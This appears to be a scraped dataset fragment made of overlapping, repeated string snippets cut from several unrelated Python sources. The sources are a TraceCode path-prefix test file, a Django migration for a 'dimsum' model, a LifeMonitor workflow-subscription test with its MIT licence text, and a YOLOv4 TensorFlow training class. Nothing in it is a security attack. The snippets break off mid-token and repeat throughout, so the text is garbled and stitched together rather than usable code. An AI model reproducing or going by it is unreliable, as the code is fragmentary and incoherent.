'/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test =", "pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/')", "import absolute_import from __future__ import division from __future__ import print_function from __future__ import", "('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1)", "('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2)", "implied. No content created from # TraceCode should be considered or used as", "def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment is ignored test", "a trademark of nexB Inc. # # You may not use this software", "test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test", "test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def", "created from # TraceCode should be considered or used as legal advice. Consult", "with TraceCode require an acknowledgment. # TraceCode is a trademark of nexB Inc.", "('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2)", "== test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test", "for support and download. # from __future__ import absolute_import from __future__ import division", "applicable law or agreed to in writing, software distributed # under the License", "require an acknowledgment. # TraceCode is a trademark of nexB Inc. # #", "== test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0) == test", "TraceCode software is licensed under the Apache License version 2.0. # Data generated" ]
[ "3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'),", "on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ]", "# Generated by Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models", "Generated by Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class", "by Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration):", "= [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary", "2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum',", "class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum',", "Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history',", "('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary here.'), ),", "models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField(", "dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write", "[ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary here.'),", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations =", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations", "'0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary here.'), ), ]", "Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [" ]
[ "Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\"", "NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE", "publish, distribute, sublicense, and/or sell # copies of the Software, and to permit", "%r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0,", "software and associated documentation files (the \"Software\"), to deal # in the Software", "copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED", "\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT", "TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.", "WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT", "OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN", "CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #", "portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT", "do so, subject to the following conditions: # # The above copyright notice", "assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected number", "EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,", "and to permit persons to whom the Software is # furnished to do", "OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION", "use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the", "the Software without restriction, including without limitation the rights # to use, copy,", "ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN", "without restriction, including without limitation the rights # to use, copy, modify, merge,", "the following conditions: # # The above copyright notice and this permission notice", "THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR", "valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert", "person obtaining a copy # of this software and associated documentation files (the", "LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND", "# furnished to do so, subject to the following conditions: # # The", "the Software, and to permit persons to whom the Software is # furnished", "permit persons to whom the Software is # furnished to do so, subject", "rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #", "THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import", "\"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s,", "Permission is hereby granted, free of charge, to any person obtaining a copy", "s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be", "lifemonitor.auth.models import Subscription, User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1:", "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR", "A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR", "SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #", "FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF", "user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions)", "in the Software without restriction, including without limitation the rights # to use,", "IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT", "EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,", "Software without restriction, including without limitation the rights # to use, copy, modify,", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies", "merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to", "logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User", "%r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1,", "== 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s)", "PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS", "OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING", "ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE", "user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s,", "copies of the Software, and to permit persons to whom the Software is", "should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s:", "s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected", "SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging", "# The above copyright notice and this permission notice shall be included in", "logging from lifemonitor.auth.models import Subscription, User from tests import utils logger = logging.getLogger()", "included in all # copies or substantial portions of the Software. # #", "import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow =", "Copyright (c) 2020-2021 CRS4 # # Permission is hereby granted, free of charge,", "# of this software and associated documentation files (the \"Software\"), to deal #", "to do so, subject to the following conditions: # # The above copyright", "OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR", "Subscription, User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow:", "is hereby granted, free of charge, to any person obtaining a copy #", "above copyright notice and this permission notice shall be included in all #", "_, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow)", "persons to whom the Software is # furnished to do so, subject to", "sell # copies of the Software, and to permit persons to whom the", "WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.", "conditions: # # The above copyright notice and this permission notice shall be", "substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\",", "INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A", "# SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests import utils", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE", "AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR", "empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow)", "OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,", "user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not", "documentation files (the \"Software\"), to deal # in the Software without restriction, including", "s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be", "to permit persons to whom the Software is # furnished to do so,", "ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT,", "or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS", "utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s)", "= logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user:", "# Copyright (c) 2020-2021 CRS4 # # Permission is hereby granted, free of", "2020-2021 CRS4 # # Permission is hereby granted, free of charge, to any", "notice shall be included in all # copies or substantial portions of the", "restriction, including without limitation the rights # to use, copy, modify, merge, publish,", "obtaining a copy # of this software and associated documentation files (the \"Software\"),", "of charge, to any person obtaining a copy # of this software and", "whom the Software is # furnished to do so, subject to the following", "= user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should", "CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH", "NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE", "FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS", "s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected", "# # Permission is hereby granted, free of charge, to any person obtaining", "MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL", "free of charge, to any person obtaining a copy # of this software", "from lifemonitor.auth.models import Subscription, User from tests import utils logger = logging.getLogger() def", "User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str):", "shall be included in all # copies or substantial portions of the Software.", "PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT", "copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software,", "OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User", "The above copyright notice and this permission notice shall be included in all", "BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR", "and/or sell # copies of the Software, and to permit persons to whom", "so, subject to the following conditions: # # The above copyright notice and", "this permission notice shall be included in all # copies or substantial portions", "LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION", "workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription:", "assert s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number", "logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow)", "FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE", "OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT", "without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense,", "# copies or substantial portions of the Software. # # THE SOFTWARE IS", "PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING", "\"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected number of subscriptions\"", "# in the Software without restriction, including without limitation the rights # to", "is # furnished to do so, subject to the following conditions: # #", "logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions) ==", "files (the \"Software\"), to deal # in the Software without restriction, including without", "Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS", "str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription =", "copy # of this software and associated documentation files (the \"Software\"), to deal", "IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE", "Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\"", "to the following conditions: # # The above copyright notice and this permission", "TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE", "to deal # in the Software without restriction, including without limitation the rights", "the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell", "to any person obtaining a copy # of this software and associated documentation", "OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging from", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS", "of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should", "following conditions: # # The above copyright notice and this permission notice shall", "USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import", "of the Software, and to permit persons to whom the Software is #", "in all # copies or substantial portions of the Software. # # THE", "the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF", "be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription =", "subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not", "and associated documentation files (the \"Software\"), to deal # in the Software without", "OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #", "= utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\",", "user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert len(user.subscriptions)", "(c) 2020-2021 CRS4 # # Permission is hereby granted, free of charge, to", "any person obtaining a copy # of this software and associated documentation files", "test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user']", "THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN", "# # The above copyright notice and this permission notice shall be included", "dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s:", "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR", "def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User =", "s, \"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of", "CRS4 # # Permission is hereby granted, free of charge, to any person", "\"Software\"), to deal # in the Software without restriction, including without limitation the", "OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE", "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #", "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #", "SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES", "1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert", "BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN", "from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _,", "AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE", "IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED,", "assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription:", "sublicense, and/or sell # copies of the Software, and to permit persons to", "a copy # of this software and associated documentation files (the \"Software\"), to", "deal # in the Software without restriction, including without limitation the rights #", "Software is # furnished to do so, subject to the following conditions: #", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR", "Software, and to permit persons to whom the Software is # furnished to", "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER", "HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN", "CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT", "including without limitation the rights # to use, copy, modify, merge, publish, distribute,", "OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE", "\"Subscription should not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\"", "THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests import", "all # copies or substantial portions of the Software. # # THE SOFTWARE", "number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription", "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #", "(the \"Software\"), to deal # in the Software without restriction, including without limitation", "this software and associated documentation files (the \"Software\"), to deal # in the", "not be empty\" assert len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription", "s, \"Subscription should not be empty\" assert len(user.subscriptions) == 0, \"Unexpected number of", "IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR", "copyright notice and this permission notice shall be included in all # copies", "IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests", "distribute, sublicense, and/or sell # copies of the Software, and to permit persons", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER", "utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1,", "charge, to any person obtaining a copy # of this software and associated", "associated documentation files (the \"Software\"), to deal # in the Software without restriction,", "SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from tests import utils logger", "WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO", "OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY,", "hereby granted, free of charge, to any person obtaining a copy # of", "of this software and associated documentation files (the \"Software\"), to deal # in", "of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY", "OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS", "= user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert", "granted, free of charge, to any person obtaining a copy # of this", "# copies of the Software, and to permit persons to whom the Software", "# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,", "WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO", "= user.unsubscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription should not be empty\" assert", "DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR", "WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED", "KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF", "THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models", "to whom the Software is # furnished to do so, subject to the", "limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or", "tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict, valid_workflow: str): _, workflow", "valid_workflow: str): _, workflow = utils.pick_and_register_workflow(user1, valid_workflow) user: User = user1['user'] s: Subscription", "permission notice shall be included in all # copies or substantial portions of", "User = user1['user'] s: Subscription = user.subscribe(workflow) logger.debug(\"Subscription: %r\", s) assert s, \"Subscription", "len(user.subscriptions) == 1, \"Unexpected number of subscriptions\" s: Subscription = user.unsubscribe(workflow) logger.debug(\"Subscription: %r\",", "furnished to do so, subject to the following conditions: # # The above", "and this permission notice shall be included in all # copies or substantial", "modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and", "ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES", "be included in all # copies or substantial portions of the Software. #", "NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY", "COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,", "DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription, User from", "import logging from lifemonitor.auth.models import Subscription, User from tests import utils logger =", "# Permission is hereby granted, free of charge, to any person obtaining a", "OR OTHER DEALINGS IN THE # SOFTWARE. import logging from lifemonitor.auth.models import Subscription,", "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of", "import Subscription, User from tests import utils logger = logging.getLogger() def test_workflow_subscription(user1: dict,", "IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "notice and this permission notice shall be included in all # copies or" ]
[ "train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1", "datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def", "# 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch", "train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch", "% save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if", "txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self):", "use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据", "loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96,", "utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email", "src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss", "decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean()", "train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return net", "format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): '''", "to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" #", "= 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes", "= -1 print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer", "2020/5/14 上午10:50 # @Author : xiao9616 # @Email : <EMAIL> # @File :", "import tensorflow as tf import os from src.yolo4.config import * from src.yolo4.util import", "src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s", "print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()", "images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as", "self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {}", "y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss:", "batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch),", "tensorflow as tf import os from src.yolo4.config import * from src.yolo4.util import *", "lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer", ") optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric", "禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net", "# 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path", "self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0", "def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for", "import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s", "step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images,", "epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch in train_dataset:", "import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b", "with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients =", "net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch))", "@Software: PyCharm # ============================================ import logging import tensorflow as tf import os from", "xiao9616 # @Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm #", "网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path +", "net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model", "class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data =", "= 0 for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return", "net.save_weights(filepath=weights_path + 